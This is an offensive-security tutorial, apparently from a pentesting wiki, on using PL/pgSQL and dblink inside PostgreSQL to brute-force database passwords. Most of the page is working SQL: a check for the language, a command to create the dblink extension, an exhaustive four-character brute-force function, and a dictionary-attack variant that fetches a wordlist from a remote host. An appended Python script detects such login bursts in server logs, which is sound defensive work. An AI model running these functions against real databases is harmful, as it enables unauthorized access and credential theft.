PL/pgSQL is a fully featured programming language that extends SQL with enhanced procedural control, including loops and other control structures. Functions written in PL/pgSQL can be called from SQL statements and triggers, which broadens the range of operations available inside the database environment.
You can abuse this language to make PostgreSQL brute force user credentials, but it must exist in the database. You can verify that it is present using:
```sql
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
 lanname | lanacl
---------+---------
 plpgsql |
```
By default, creating functions is a privilege granted to PUBLIC, where PUBLIC refers to every user on that database system. To prevent this, the administrator could have revoked the USAGE privilege from the PUBLIC domain:
```sql
REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;
```
In that case, our earlier query would return different results:
```sql
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
 lanname | lanacl
---------+-----------------
 plpgsql | {admin=U/admin}
```
Note that for the script to work, the function dblink needs to exist. If it does not, you could try to create it with
```sql
CREATE EXTENSION dblink;
```
Password Brute Force
Here is how you could brute force a 4-character password:
```sql
-- Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
                                       username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
  word TEXT;
BEGIN
  FOR a IN 65..122 LOOP
    FOR b IN 65..122 LOOP
      FOR c IN 65..122 LOOP
        FOR d IN 65..122 LOOP
          BEGIN
            word := chr(a) || chr(b) || chr(c) || chr(d);
            PERFORM(SELECT * FROM dblink(' host=' || host ||
                                         ' port=' || port ||
                                         ' dbname=' || dbname ||
                                         ' user=' || username ||
                                         ' password=' || word,
                                         'SELECT 1')
                    RETURNS (i INT));
            RETURN word;
          EXCEPTION
            WHEN sqlclient_unable_to_establish_sqlconnection THEN
              -- do nothing
          END;
        END LOOP;
      END LOOP;
    END LOOP;
  END LOOP;
  RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';

-- Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
```
Note that even brute forcing 4 characters may take several minutes.
You could also download a wordlist and try only those passwords (dictionary attack):
```sql
-- Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
                                       username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
  word TEXT;  -- loop target must be declared
BEGIN
  -- the column is qualified (wl.word) so it does not clash with the variable
  FOR word IN SELECT wl.word FROM dblink('host=1.2.3.4 user=name password=qwerty dbname=wordlists',
                                         'SELECT word FROM wordlist')
              AS wl(word TEXT) LOOP
    BEGIN
      PERFORM(SELECT * FROM dblink(' host=' || host ||
                                   ' port=' || port ||
                                   ' dbname=' || dbname ||
                                   ' user=' || username ||
                                   ' password=' || word,
                                   'SELECT 1')
              RETURNS (i INT));
      RETURN word;
    EXCEPTION
      WHEN sqlclient_unable_to_establish_sqlconnection THEN
        -- do nothing
    END;
  END LOOP;
  RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';

-- Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
```
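Seen from the defender's side, every wrong guess made by the functions above is logged by the target server as a failed password authentication, and with the `127.0.0.1` target used in the calls above the client address is the server's own loopback. The following is an added example (not part of the original page) that flags such bursts in a PostgreSQL log; the `log_line_prefix` of `'%m [%p] %h %u@%d '`, the thresholds and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed log_line_prefix: '%m [%p] %h %u@%d ' (adapt the regex to your own prefix).
FAILED = re.compile(
    r'^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+ \S+ \[\d+\] (?P<host>\S+) \S+ '
    r'FATAL:\s+password authentication failed for user "(?P<user>[^"]+)"')
LOOPBACK = {"127.0.0.1", "::1"}  # client address when dblink targets the server itself

def find_bursts(lines, threshold=20, window=timedelta(seconds=10)):
    """Alert once per (client host, role) with >= threshold failures inside window."""
    recent, alerts = defaultdict(deque), {}
    for line in lines:
        m = FAILED.match(line)
        if not m:
            continue  # not a failed password authentication
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        key = (m["host"], m["user"])
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = {"host": key[0], "user": key[1], "first_seen": q[0],
                           "from_server_itself": key[0] in LOOPBACK}
    return list(alerts.values())

def sample_log():
    """Constructed log lines: a fast loopback burst plus a user mistyping a password."""
    fmt = ('{} UTC [{}] {} {}@postgres FATAL:  '
           'password authentication failed for user "{}"')
    stamp = lambda t: t.strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
    base, lines = datetime(2024, 5, 1, 10, 0, 0), []
    for i in range(60):  # 60 failures in 3 seconds against one role
        t = base + timedelta(milliseconds=50 * i)
        lines.append(fmt.format(stamp(t), 5000 + i, "127.0.0.1", "postgres", "postgres"))
    for i in range(3):   # 3 failures spread over 10 minutes
        t = base + timedelta(minutes=5 * i)
        lines.append(fmt.format(stamp(t), 7000 + i, "10.0.0.7", "alice", "alice"))
    lines.append(stamp(base) + " UTC [7100] 10.0.0.7 alice@postgres "
                 "LOG:  connection authorized: user=alice database=postgres")
    return lines

if __name__ == "__main__":
    for alert in find_bursts(sample_log()):
        print(alert)
```

An alert with `from_server_itself` set is the case worth triaging first, since ordinary clients rarely fail authentication at that rate from the database host's own loopback address.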